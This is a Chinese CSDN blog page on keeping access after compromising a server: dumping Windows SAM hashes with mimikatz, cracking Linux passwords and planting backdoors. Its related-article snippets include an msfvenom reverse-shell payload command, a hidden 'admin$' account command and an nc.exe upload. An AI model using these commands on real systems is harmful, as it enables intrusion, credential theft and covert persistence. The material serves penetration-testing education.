权限维持——获取登陆账号及安装后门程序

最新推荐文章于 2021-12-18 11:46:14 发布
最新推荐文章于 2021-12-18 11:46:14 发布
阅读量858 收藏
点赞数 1
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104828799
版权
本文介绍了攻击者如何在获取服务器权限后,通过获取Windows和Linux系统登录账号以及安装不同类型的后门程序来维持权限。实验详细说明了在Windows系统中利用QuarksPwDump.exe和mimikatz工具获取账号密码,在Linux系统中使用john the ripper破解密码。此外,还列举了多种后门技术,如隐藏账户、404页面隐藏webshell、shift后门和DLL劫持等。
摘要由CSDN通过智能技术生成

当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。

实验一:获取windows系统登录账号

实验环境:windows2008

windows系统登陆账号存储位置:C:\Windows\System32\config\SAM

windows密码验证原理:
在Windows系统中,对用户账户的安全管理采用了SAM(Security Account Manager,安全账号管理)机制,用户账户以及密码经过Hash加密之后,都保存在SAM数据库中。
SAM数据库保存在C:\WINDOWS\system32\config\SAM文件中,当用户登录系统时,首先就要与SAM文件中存放的账户信息进行对比,验证通过方可登录。系统对SAM文件提供了保护机制,无法将其复制或是删除,也无法直接读取其中的内容。

-SAM文件两种加密方式介绍:  LM加密和NTLM加密
 对于Windows2003之前,包括win2003系统,采用的是LM口令散列,对于Windows 2003之后的系统,采用的是NTLM口令列。
 LM和NTLM都是基于Hash加密,但是它们的安全机制和安全强度存在差别,LM口令散列的安全性相对比较差。尽管现在已很少有人使用Windows2k之前的老版本系统,但为了保持向后兼容性,默认情况下࿰

最低0.47元/天 解锁文章
没有如果ru果
关注
专栏目录
内网权限维持 —— 后门
战神/calmness的博客
12-09 1181
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
权限提权——Win提权漏洞及数据库&AT&SC&PS提权
最新发布
m0_61506558的博客
10-12 680
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要提升自己的权限,就得在后台页面中寻找漏洞利用的点,成功上传webshell提升权限.(一)权限提升权限介绍​ 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限
windows/android后门维持
qq_2411772106的博客
08-09 601
搭建环境:kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpr
Android后门GhostCtrl,完美控制设备任意权限并窃取用户数据
weixin_33676492的博客
07-19 239
Android系统似乎已经成为世界各地病毒作者的首选目标,每天都有新的恶意软件在感染更多的设备。 这一次,安全公司趋势科技发布警告,他们发现了一个新的Android后门——GhostCtrl GhostCtrl被发现有3个版本,第一代窃取信息并控制一些设备的功能,第二代增加了更多的功能来劫持设备,第三代结合了早期的版本特性,功能更加强大,...
权限维持:常用后门
f_carey的博客
12-18 1548
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门(metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
权限维持-影子用户后门
god_Zeo的安全博客
10-12 284
0x00 前提 水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面 0x01权限维持-影子用户后门 影子账户,古老但有效! 原理 代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号 效果 net user无法删除,需要删除注册表相关键值; Windows 的登录界面不显示该用户信息。 0x02 简单实用 ShadowUser.exe admin administrator 可以正常登录,桌面什么也是克隆的administrat
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4406
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
内网渗透——权限维持
cldimd的博客
03-23 1212
一、权限维持: 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门维持权限,达到持续控制的目的。 二、获取windows系统登陆账号: 系统登陆账号存储位置:C:\Windows\System32...
获取meterpreter权限后如何留后门
黑锤的博客
09-21 2261
我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令 创建文本,并向里出入内容,并打开: echo "hello I am hacker" >>1.txt 之后再打开:notepad 1.txt即可 拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号 方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrat
安卓后门工具:backdoor-apk 教程
Sumarua的博客
07-26 7455
文章目录安卓后门工具:backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下:3、在当前目录下,我们可以看到一个脚本文件。4、Android清单权限选项:如何判断后门APK是否生成 成功?5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:6、同时,我将生成的带有后门的 AP
后门工具dbd
07-01 312
后门工具dbd dbd功能类似于Netcat,但提供强大的加密功能,支持AES-CBC-128和HMAC-SHA1加密。该工具可以运行在类Unix和Windows系统中。渗透测试人员首先使用该工具...
入侵电脑留后门
热门推荐
毛兴宇
12-15 1万+
从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原。但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门。   1、放大镜后门   放大镜(magnify.exe)是Windows2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win
linux有root权限后门,linux下获取root权限安装后门程序rootkit
weixin_29148445的博客
05-16 360
来源www.linuxso.com1.首先是获得远程服务器的root权限,当然这是必须的。2.然后下载rootkit程序,本文用到的是mafix,可以点击下载,也可以到附件中去下载。下载前做好把杀毒软件关掉,基本上汇报毒的。3.开始安装tar zxvf mafix.tar.gzcd mafix./root rootkit345 (其中rootkit为你连接后门程序时的密码,345为连接的端口)...
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 450
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
权限维持篇---Windows权限维持--隐藏篇
永不垂头的博客
04-29 1284
权限维持篇—Windows权限维持–隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
利用SQL注入获取服务器最高权限
weixin_33730836的博客
11-01 2202
单位有台数据库服务器(windows 2000 操作系统,sql server 2000)前段时间莫名其妙的被***了跑到机房,通过PE进去一看,发现多了一个账户(SQLDEBUG)。并且administrator账户被禁用了看看数据没少,也没太在意。利用PE把账户破解了一下,就回单位了今晚回来刚好要去数据库服务器上,下个数据库备份文件。结果发现密码又登陆不了。不祥预感出来...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值